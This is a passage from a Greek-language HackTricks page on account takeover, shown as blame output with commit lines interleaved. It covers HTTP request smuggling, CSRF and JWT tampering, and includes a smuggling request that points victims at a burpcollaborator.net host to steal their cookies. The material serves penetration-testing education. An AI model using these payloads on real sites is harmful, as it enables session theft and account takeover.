-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 16:35:17 +00:00
+\. Δημιουργήστε ένα αίτημα που θα αντικαταστήσει το `POST / HTTP/1.1` με τα παρακάτω δεδομένα:\
 								`GET http://something.burpcollaborator.net HTTP/1.1 X:` με στόχο να ανοίξετε ανακατεύθυνση των θυμάτων στο burpcollab και να κλέψετε τα cookies τους\
 \. Το τελικό αίτημα θα μπορούσε να μοιάζει με το εξής
-												GitBook: [#2870] update

											
										
										
											2021-11-30 00:17:48 +00:00
+								```
 								GET / HTTP/1.1
 								Transfer-Encoding: chunked
 								Host: something.com
 								User-Agent: Smuggler/v1.0
 								Content-Length: 83
 
 								GET http://something.burpcollaborator.net  HTTP/1.1
 								X: X
 								```
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 16:35:17 +00:00
+								Hackerone reports exploiting this bug\
 								\* [https://hackerone.com/reports/737140](https://hackerone.com/reports/737140)\
 								\* [https://hackerone.com/reports/771666](https://hackerone.com/reports/771666)
 								### Account Takeover via CSRF <a href="#account-takeover-via-csrf" id="account-takeover-via-csrf"></a>
-												GitBook: [#2870] update

											
										
										
											2021-11-30 00:17:48 +00:00
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 16:35:17 +00:00
+. Δημιουργήστε ένα payload για το CSRF, π.χ: “HTML φόρμα με αυτόματη υποβολή για αλλαγή κωδικού”
 . Στείλτε το payload
-												GitBook: [#2870] update

											
										
										
											2021-11-30 00:17:48 +00:00
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 16:35:17 +00:00
+								### Account Takeover via JWT <a href="#account-takeover-via-jwt" id="account-takeover-via-jwt"></a>
-												GitBook: [#2870] update

											
										
										
											2021-11-30 00:17:48 +00:00
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 16:35:17 +00:00
+								Το JSON Web Token μπορεί να χρησιμοποιηθεί για την αυθεντικοποίηση ενός χρήστη.
-												GitBook: [#2870] update

											
										
										
											2021-11-30 00:17:48 +00:00
-												Translated ['README.md', 'crypto-and-stego/hash-length-extension-attack.

											
										
										
											2024-04-18 07:07:09 +00:00
+								* Επεξεργαστείτε το JWT με άλλο User ID / Email
-												Translated to Greek

											
										
										
											2024-02-10 22:40:18 +00:00
+								* Ελέγξτε για αδύναμη υπογραφή JWT
-												GitBook: [#2870] update

											
										
										
											2021-11-30 00:17:48 +00:00
 								{% content-ref url="hacking-jwt-json-web-tokens.md" %}
 								[hacking-jwt-json-web-tokens.md](hacking-jwt-json-web-tokens.md)
 								{% endcontent-ref %}
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 16:35:17 +00:00
+								## References
-												GitBook: [#2870] update

											
										
										
											2021-11-30 00:17:48 +00:00
 								* [https://salmonsec.com/cheatsheet/account\_takeover](https://salmonsec.com/cheatsheet/account\_takeover)
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi

											
										
										
											2024-04-18 04:11:25 +00:00
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 16:35:17 +00:00
+								{% hint style="success" %}
 								Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
 								Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
-												Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi

											
										
										
											2024-04-18 04:11:25 +00:00
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
+								<details>
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 16:35:17 +00:00
+								<summary>Support HackTricks</summary>
-												a

											
										
										
											2024-02-03 14:45:32 +00:00
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 16:35:17 +00:00
+								* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
 								* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
 								* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
 								</details>
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 16:35:17 +00:00
+								{% endhint %}